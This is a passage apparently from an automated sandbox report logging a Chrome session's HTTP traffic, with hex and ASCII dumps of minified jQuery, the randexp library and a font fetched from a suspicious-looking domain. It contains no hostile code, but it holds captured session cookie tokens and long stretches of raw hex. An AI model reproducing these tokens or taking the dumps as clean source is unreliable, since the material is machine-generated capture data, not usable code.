                                                              2024-07-03 07:41:06 UTC1378INData Raw: 73 2e 6f 70 74 69 6f 6e 2e 67 65 74 28 72 29 2c 6f 29 29 26 26 28 6e 3d 21 30 29 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 3d 2d 31 29 2c 6f 7d 7d 7d 7d 29 2c 53 2e 65 61 63 68 28 5b 22 72 61 64 69 6f 22 2c 22 63 68 65 63 6b 62 6f 78 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 53 2e 76 61 6c 48 6f 6f 6b 73 5b 74 68 69 73 5d 3d 7b 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 29 72 65 74 75 72 6e 20 65 2e 63 68 65 63 6b 65 64 3d 2d 31 3c 53 2e 69 6e 41 72 72 61 79 28 53 28 65 29 2e 76 61 6c 28 29 2c 74 29 7d 7d 2c 79 2e 63 68 65 63 6b 4f 6e 7c 7c 28 53 2e 76 61 6c 48 6f 6f 6b 73 5b 74 68 69 73 5d 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74
                                                              Data Ascii: s.option.get(r),o))&&(n=!0);return n||(e.selectedIndex=-1),o}}}}),S.each(["radio","checkbox"],function(){S.valHooks[this]={set:function(e,t){if(Array.isArray(t))return e.checked=-1<S.inArray(S(e).val(),t)}},y.checkOn||(S.valHooks[this].get=function(e){ret
                                                              2024-07-03 07:41:06 UTC1378INData Raw: 26 6c 2e 61 70 70 6c 79 28 6f 2c 74 29 2c 28 6c 3d 75 26 26 6f 5b 75 5d 29 26 26 6c 2e 61 70 70 6c 79 26 26 56 28 6f 29 26 26 28 65 2e 72 65 73 75 6c 74 3d 6c 2e 61 70 70 6c 79 28 6f 2c 74 29 2c 21 31 3d 3d 3d 65 2e 72 65 73 75 6c 74 26 26 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 29 3b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 3d 64 2c 72 7c 7c 65 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 7c 7c 63 2e 5f 64 65 66 61 75 6c 74 26 26 21 31 21 3d 3d 63 2e 5f 64 65 66 61 75 6c 74 2e 61 70 70 6c 79 28 70 2e 70 6f 70 28 29 2c 74 29 7c 7c 21 56 28 6e 29 7c 7c 75 26 26 6d 28 6e 5b 64 5d 29 26 26 21 78 28 6e 29 26 26 28 28 61 3d 6e 5b 75 5d 29 26 26 28 6e 5b 75 5d 3d 6e 75 6c 6c 29 2c 53 2e 65 76 65 6e 74 2e 74 72 69 67 67 65 72 65 64
                                                              Data Ascii: &l.apply(o,t),(l=u&&o[u])&&l.apply&&V(o)&&(e.result=l.apply(o,t),!1===e.result&&e.preventDefault());return e.type=d,r||e.isDefaultPrevented()||c._default&&!1!==c._default.apply(p.pop(),t)||!V(n)||u&&m(n[d])&&!x(n)&&((a=n[u])&&(n[u]=null),S.event.triggered
                                                              2024-07-03 07:41:06 UTC1378INData Raw: 2e 65 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 58 4d 4c 3a 20 22 2b 28 6e 3f 53 2e 6d 61 70 28 6e 2e 63 68 69 6c 64 4e 6f 64 65 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 65 78 74 43 6f 6e 74 65 6e 74 7d 29 2e 6a 6f 69 6e 28 22 5c 6e 22 29 3a 65 29 29 2c 74 7d 3b 76 61 72 20 43 74 3d 2f 5c 5b 5c 5d 24 2f 2c 45 74 3d 2f 5c 72 3f 5c 6e 2f 67 2c 53 74 3d 2f 5e 28 3f 3a 73 75 62 6d 69 74 7c 62 75 74 74 6f 6e 7c 69 6d 61 67 65 7c 72 65 73 65 74 7c 66 69 6c 65 29 24 2f 69 2c 6b 74 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 6b 65 79 67 65 6e 29 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 41 74 28 6e 2c 65 2c 72 2c 69 29 7b 76 61 72 20 74 3b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29
                                                              Data Ascii: .error("Invalid XML: "+(n?S.map(n.childNodes,function(e){return e.textContent}).join("\n"):e)),t};var Ct=/\[\]$/,Et=/\r?\n/g,St=/^(?:submit|button|image|reset|file)$/i,kt=/^(?:input|select|textarea|keygen)/i;function At(n,e,r,i){var t;if(Array.isArray(e))
                                                              2024-07-03 07:41:06 UTC1378INData Raw: 74 3d 7b 7d 2c 52 74 3d 22 2a 2f 22 2e 63 6f 6e 63 61 74 28 22 2a 22 29 2c 4d 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 3b 66 75 6e 63 74 69 6f 6e 20 49 74 28 6f 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 65 26 26 28 74 3d 65 2c 65 3d 22 2a 22 29 3b 76 61 72 20 6e 2c 72 3d 30 2c 69 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 6d 61 74 63 68 28 50 29 7c 7c 5b 5d 3b 69 66 28 6d 28 74 29 29 77 68 69 6c 65 28 6e 3d 69 5b 72 2b 2b 5d 29 22 2b 22 3d 3d 3d 6e 5b 30 5d 3f 28 6e 3d 6e 2e 73 6c 69 63 65 28 31 29 7c 7c 22 2a 22 2c 28 6f 5b 6e 5d 3d 6f 5b 6e 5d 7c 7c 5b 5d 29 2e 75 6e 73 68 69 66 74 28 74 29 29 3a 28 6f 5b 6e 5d 3d 6f 5b 6e 5d 7c 7c 5b 5d 29 2e
                                                              Data Ascii: t={},Rt="*/".concat("*"),Mt=E.createElement("a");function It(o){return function(e,t){"string"!=typeof e&&(t=e,e="*");var n,r=0,i=e.toLowerCase().match(P)||[];if(m(t))while(n=i[r++])"+"===n[0]?(n=n.slice(1)||"*",(o[n]=o[n]||[]).unshift(t)):(o[n]=o[n]||[]).
                                                              2024-07-03 07:41:06 UTC1378INData Raw: 78 53 65 74 74 69 6e 67 73 2c 65 29 7d 2c 61 6a 61 78 50 72 65 66 69 6c 74 65 72 3a 49 74 28 4f 74 29 2c 61 6a 61 78 54 72 61 6e 73 70 6f 72 74 3a 49 74 28 50 74 29 2c 61 6a 61 78 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 74 3d 65 2c 65 3d 76 6f 69 64 20 30 29 2c 74 3d 74 7c 7c 7b 7d 3b 76 61 72 20 63 2c 66 2c 70 2c 6e 2c 64 2c 72 2c 68 2c 67 2c 69 2c 6f 2c 76 3d 53 2e 61 6a 61 78 53 65 74 75 70 28 7b 7d 2c 74 29 2c 79 3d 76 2e 63 6f 6e 74 65 78 74 7c 7c 76 2c 6d 3d 76 2e 63 6f 6e 74 65 78 74 26 26 28 79 2e 6e 6f 64 65 54 79 70 65 7c 7c 79 2e 6a 71 75 65 72 79 29 3f 53 28 79 29 3a 53 2e 65 76 65 6e 74 2c 78 3d 53 2e 44 65 66 65 72 72 65 64 28 29 2c 62 3d 53 2e 43 61 6c 6c 62 61 63 6b 73 28
                                                              Data Ascii: xSettings,e)},ajaxPrefilter:It(Ot),ajaxTransport:It(Pt),ajax:function(e,t){"object"==typeof e&&(t=e,e=void 0),t=t||{};var c,f,p,n,d,r,h,g,i,o,v=S.ajaxSetup({},t),y=v.context||v,m=v.context&&(y.nodeType||y.jquery)?S(y):S.event,x=S.Deferred(),b=S.Callbacks(
                                                              2024-07-03 07:41:06 UTC1378INData Raw: 3b 66 6f 72 28 69 20 69 6e 28 67 3d 53 2e 65 76 65 6e 74 26 26 76 2e 67 6c 6f 62 61 6c 29 26 26 30 3d 3d 53 2e 61 63 74 69 76 65 2b 2b 26 26 53 2e 65 76 65 6e 74 2e 74 72 69 67 67 65 72 28 22 61 6a 61 78 53 74 61 72 74 22 29 2c 76 2e 74 79 70 65 3d 76 2e 74 79 70 65 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2c 76 2e 68 61 73 43 6f 6e 74 65 6e 74 3d 21 4c 74 2e 74 65 73 74 28 76 2e 74 79 70 65 29 2c 66 3d 76 2e 75 72 6c 2e 72 65 70 6c 61 63 65 28 6a 74 2c 22 22 29 2c 76 2e 68 61 73 43 6f 6e 74 65 6e 74 3f 76 2e 64 61 74 61 26 26 76 2e 70 72 6f 63 65 73 73 44 61 74 61 26 26 30 3d 3d 3d 28 76 2e 63 6f 6e 74 65 6e 74 54 79 70 65 7c 7c 22 22 29 2e 69 6e 64 65 78 4f 66 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63
                                                              Data Ascii: ;for(i in(g=S.event&&v.global)&&0==S.active++&&S.event.trigger("ajaxStart"),v.type=v.type.toUpperCase(),v.hasContent=!Lt.test(v.type),f=v.url.replace(jt,""),v.hasContent?v.data&&v.processData&&0===(v.contentType||"").indexOf("application/x-www-form-urlenc


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              51192.168.2.662931185.199.109.1334434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:06 UTC1125OUTGET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240703%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240703T073932Z&X-Amz-Expires=300&X-Amz-Signature=aca7c6b73d5e3c084a388576b46174841ccd1d5d20df0b47f08acd7640c141a5&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1
                                                              Host: objects.githubusercontent.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: script
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:06 UTC819INHTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 10245
                                                              Content-Type: application/octet-stream
                                                              Content-MD5: bCCivoupALwKcRiJOisQcg==
                                                              Last-Modified: Tue, 07 Dec 2021 16:38:45 GMT
                                                              ETag: "0x8D9B9A009499A1E"
                                                              Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                              x-ms-request-id: 04b78ebf-b01e-005d-5b87-b2ebd1000000
                                                              x-ms-version: 2020-10-02
                                                              x-ms-creation-time: Tue, 17 Aug 2021 14:57:31 GMT
                                                              x-ms-lease-status: unlocked
                                                              x-ms-lease-state: available
                                                              x-ms-blob-type: BlockBlob
                                                              Content-Disposition: attachment; filename=randexp.min.js
                                                              x-ms-server-encrypted: true
                                                              Via: 1.1 varnish, 1.1 varnish
                                                              Accept-Ranges: bytes
                                                              Age: 0
                                                              Date: Wed, 03 Jul 2024 07:41:06 GMT
                                                              X-Served-By: cache-iad-kjyo7100092-IAD, cache-nyc-kteb1890026-NYC
                                                              X-Cache: HIT, MISS
                                                              X-Cache-Hits: 13040, 0
                                                              X-Timer: S1719992466.358398,VS0,VE229
                                                              2024-07-03 07:41:06 UTC1378INData Raw: 2f 2f 0a 2f 2f 20 72 61 6e 64 65 78 70 20 76 30 2e 34 2e 33 0a 2f 2f 20 43 72 65 61 74 65 20 72 61 6e 64 6f 6d 20 73 74 72 69 6e 67 73 20 74 68 61 74 20 6d 61 74 63 68 20 61 20 67 69 76 65 6e 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 2e 0a 2f 2f 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 32 30 31 36 20 62 79 20 52 6f 6c 79 20 46 65 6e 74 61 6e 65 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 29 0a 2f 2f 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 2f 2f 20 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 2f 72 61 6e 64 65 78 70 2e 6a 73 2f 72 61 77 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 20 0a 2f 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 22 52 61 6e 64 45 78 70 22
                                                              Data Ascii: //// randexp v0.4.3// Create random strings that match a given regular expression.//// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent)// MIT License// http://github.com/fent/randexp.js/raw/master/LICENSE //!function(){var e="RandExp"
                                                              2024-07-03 07:41:06 UTC1378INData Raw: 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 72 61 6e 64 49 6e 74 26 26 28 65 2e 72 61 6e 64 49 6e 74 3d 74 2e 72 61 6e 64 49 6e 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 76 61 72 20 6e 2c 69 2c 70 2c 68 2c 63 3b 73 77 69 74 63 68 28 65 2e 74 79 70 65 29 7b 63 61 73 65 20 6c 2e 52 4f 4f 54 3a 63 61 73 65 20 6c 2e 47 52 4f 55 50 3a 69 66 28 65 2e 66 6f 6c 6c 6f 77 65 64 42 79 7c 7c 65 2e 6e 6f 74 46 6f 6c 6c 6f 77 65 64 42 79 29 72 65 74 75 72 6e 22 22 3b 66 6f 72 28 65 2e 72 65 6d 65 6d 62 65 72 26 26 76 6f 69 64 20 30 3d 3d 3d 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 26 26 28 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 3d 74 2e 70 75 73 68 28 6e 75 6c 6c 29 2d 31 29 2c 6e 3d 65 2e 6f 70 74 69 6f 6e 73 3f 61 2e 63 61 6c 6c
                                                              Data Ascii: ),"function"==typeof t.randInt&&(e.randInt=t.randInt)}function u(e,t){var n,i,p,h,c;switch(e.type){case l.ROOT:case l.GROUP:if(e.followedBy||e.notFollowedBy)return"";for(e.remember&&void 0===e.groupNumber&&(e.groupNumber=t.push(null)-1),n=e.options?a.call
                                                              2024-07-03 07:41:06 UTC1378INData Raw: 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 2e 72 61 6e 64 65 78 70 28 74 68 69 73 29 7d 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 66 61 75 6c 74 52 61 6e 67 65 3d 6e 65 77 20 68 28 33 32 2c 31 32 36 29 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 72 61 6e 64 49 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 28 31 2b 74 2d 65 29 29 7d 7d 2c 7b 22 64 69 73 63 6f 6e 74 69 6e 75 6f 75 73 2d 72 61 6e 67 65 22 3a 32 2c 72 65 74 3a 33 7d 5d 2c 32 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 74 68 69 73 2e 6c 6f 77 3d 65 2c 74 68 69 73 2e 68 69 67 68 3d 74 2c 74 68 69 73 2e 6c 65
                                                              Data Ascii: en=function(){return c.randexp(this)}},c.prototype.defaultRange=new h(32,126),c.prototype.randInt=function(e,t){return e+Math.floor(Math.random()*(1+t-e))}},{"discontinuous-range":2,ret:3}],2:[function(e,t,n){function r(e,t){this.low=e,this.high=t,this.le
                                                              2024-07-03 07:41:06 UTC1378INData Raw: 2e 6c 65 6e 67 74 68 3b 29 74 2e 70 75 73 68 28 73 2e 72 61 6e 67 65 73 5b 6e 5d 2e 63 6c 6f 6e 65 28 29 29 2c 6e 2b 2b 3b 73 2e 72 61 6e 67 65 73 3d 74 2c 61 28 73 29 7d 76 61 72 20 73 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 3f 65 2e 72 61 6e 67 65 73 2e 66 6f 72 45 61 63 68 28 6e 29 3a 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 72 3f 6e 28 65 29 3a 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 65 29 2c 6e 28 6e 65 77 20 72 28 65 2c 74 29 29 29 2c 74 68 69 73 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 75 62 74 72 61 63 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 73 2e 72 61 6e 67 65 73 2e 6c 65 6e 67 74 68 26 26
                                                              Data Ascii: .length;)t.push(s.ranges[n].clone()),n++;s.ranges=t,a(s)}var s=this;return e instanceof o?e.ranges.forEach(n):e instanceof r?n(e):(void 0===t&&(t=e),n(new r(e,t))),this},o.prototype.subtract=function(e,t){function n(e){for(var t=[],n=0;n<s.ranges.length&&
                                                              2024-07-03 07:41:06 UTC1378INData Raw: 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 44 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 22 3a 68 2e 70 75 73 68 28 61 2e 77 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 53 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 2f 5c 64 2f 2e 74 65 73 74 28 6e 29 3f 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 46 45 52 45 4e 43 45 2c 76 61 6c 75 65 3a 70 61 72 73 65 49 6e 74 28 6e 2c 31 30 29 7d 29 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 62 72 65 61 6b 3b 63 61 73 65 22 5e 22 3a 68 2e 70 75 73 68 28 73 2e
                                                              Data Ascii: );break;case"D":h.push(a.notInts());break;case"s":h.push(a.whitespace());break;case"S":h.push(a.notWhitespace());break;default:/\d/.test(n)?h.push({type:o.REFERENCE,value:parseInt(n,10)}):h.push({type:o.CHAR,value:n.charCodeAt(0)})}break;case"^":h.push(s.
                                                              2024-07-03 07:41:06 UTC1378INData Raw: 68 26 26 63 28 69 29 2c 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 50 45 54 49 54 49 4f 4e 2c 6d 69 6e 3a 30 2c 6d 61 78 3a 31 2f 30 2c 76 61 6c 75 65 3a 68 2e 70 6f 70 28 29 7d 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 72 65 74 75 72 6e 20 30 21 3d 3d 6c 2e 6c 65 6e 67 74 68 26 26 72 2e 65 72 72 6f 72 28 65 2c 22 55 6e 74 65 72 6d 69 6e 61 74 65 64 20 67 72 6f 75 70 22 29 2c 75 7d 2c 74 2e 65 78 70 6f 72 74 73 2e 74 79 70 65 73 3d 6f 7d 2c 7b 22 2e 2f 70 6f 73 69 74 69 6f 6e 73 22 3a 34 2c 22 2e 2f 73 65 74 73 22 3a 35 2c 22 2e 2f 74 79 70 65 73 22 3a 36 2c 22 2e 2f 75 74 69 6c 22 3a 37 7d 5d 2c 34 3a 5b 66 75
                                                              Data Ascii: h&&c(i),h.push({type:o.REPETITION,min:0,max:1/0,value:h.pop()});break;default:h.push({type:o.CHAR,value:n.charCodeAt(0)})}return 0!==l.length&&r.error(e,"Unterminated group"),u},t.exports.types=o},{"./positions":4,"./sets":5,"./types":6,"./util":7}],4:[fu
                                                              2024-07-03 07:41:06 UTC1378INData Raw: 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 36 35 32 37 39 7d 5d 7d 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 30 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 33 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 32 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 33 7d 5d 7d 3b 6e 2e 77 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 31 7d 7d 2c 6e 2e 6e 6f 74 57 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 30 7d 7d 2c 6e 2e 69 6e
                                                              Data Ascii: r.CHAR,value:65279}]},i=function(){return[{type:r.CHAR,value:10},{type:r.CHAR,value:13},{type:r.CHAR,value:8232},{type:r.CHAR,value:8233}]};n.words=function(){return{type:r.SET,set:a(),not:!1}},n.notWords=function(){return{type:r.SET,set:a(),not:!0}},n.in
                                                              2024-07-03 07:41:06 UTC599INData Raw: 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 34 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 6f 72 64 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 35 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 36 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 37 5d 29 69 2e 70 75 73 68 28 7b 74 79 70 65 3a 72 2e 52 41 4e 47 45 2c 66 72 6f 6d 3a 28 61 5b 38 5d 7c 7c 61 5b 39 5d 29 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2c 74 6f 3a 61 5b 31 30 5d 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 3b 65 6c 73 65 7b 69 66 28 21 28 73 3d 61 5b 31 32 5d 29 29 72 65 74 75 72 6e 5b 69 2c 75 2e 6c 61 73 74 49 6e 64 65 78 5d 3b 69 2e 70 75
                                                              Data Ascii: hitespace());else if(a[4])i.push(o.notWords());else if(a[5])i.push(o.notInts());else if(a[6])i.push(o.notWhitespace());else if(a[7])i.push({type:r.RANGE,from:(a[8]||a[9]).charCodeAt(0),to:a[10].charCodeAt(0)});else{if(!(s=a[12]))return[i,u.lastIndex];i.pu


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              52192.168.2.662933188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:06 UTC1403OUTGET /90YOSnhY5T8JbcpfefM5jeqjHMc7G9ab72 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              Origin: https://vkwek.ckyucle.com
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: font
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:07 UTC639INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:06 GMT
                                                              Content-Type: font/woff2
                                                              Content-Length: 43596
                                                              Connection: close
                                                              Content-Disposition: inline; filename="90YOSnhY5T8JbcpfefM5jeqjHMc7G9ab72"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oeo6HJz6iszMTA8VZ7%2FMgfXYheLmCK2dnA8ng8LdunJjLWM%2B4PPtdTk%2BNAzX%2FS9caBMF6I7ls4%2BrXSAmtm%2BPa8FsKGywB9f4gTrv3yzr9vW%2FxDFwOzuFvAov%2Fr0lCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b343dd1c34b-EWR
                                                              2024-07-03 07:41:07 UTC730INData Raw: 77 4f 46 32 00 01 00 00 00 00 aa 4c 00 13 00 00 00 01 cf 50 00 00 a9 d5 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 55 1b 82 e4 7a 1c 8b 04 3f 48 56 41 52 8a 3b 3f 4d 56 41 52 46 06 60 3f 53 54 41 54 1c 00 8e 48 2f 4c 11 08 0a 81 c2 40 81 a5 50 0b 87 3e 00 30 82 8e 00 01 36 02 24 03 8e 78 04 20 05 8d 2e 07 97 7b 5b d6 bb 71 05 b3 c3 e4 8f 52 6c ba 0d 01 b0 74 fa f4 7e 76 f7 0b e8 b1 ed 28 e5 b6 c1 e8 b6 d0 54 c3 74 05 3b f6 14 6e 27 b0 dd 76 3d cc fe ff ff 3f 7f 99 88 6c 5d 02 78 49 92 b5 85 6d 1d 22 a8 ea 3f 68 4e 58 04 2c 02 96 b5 38 1a 3b 47 b4 d6 af cb 6d 2c 7d c1 68 d7 aa 3e 28 3d 5b ac 96 88 6d 2f d4 3e 9b b8 a1 ef 38 26 66 c1 e0 26 9d 06 1b b8 9b ad 91 5d a1 75 95 dd e0 26 9c 56 44 8f e5 5d ec 3c 8d 04 79 52 93 65
                                                              Data Ascii: wOF2LPUz?HVAR;?MVARF`?STATH/L@P>06$x .{[qRlt~v(Tt;n'v=?l]xIm"?hNX,8;Gm,}h>(=[m/>8&f&]u&VD]<yRe
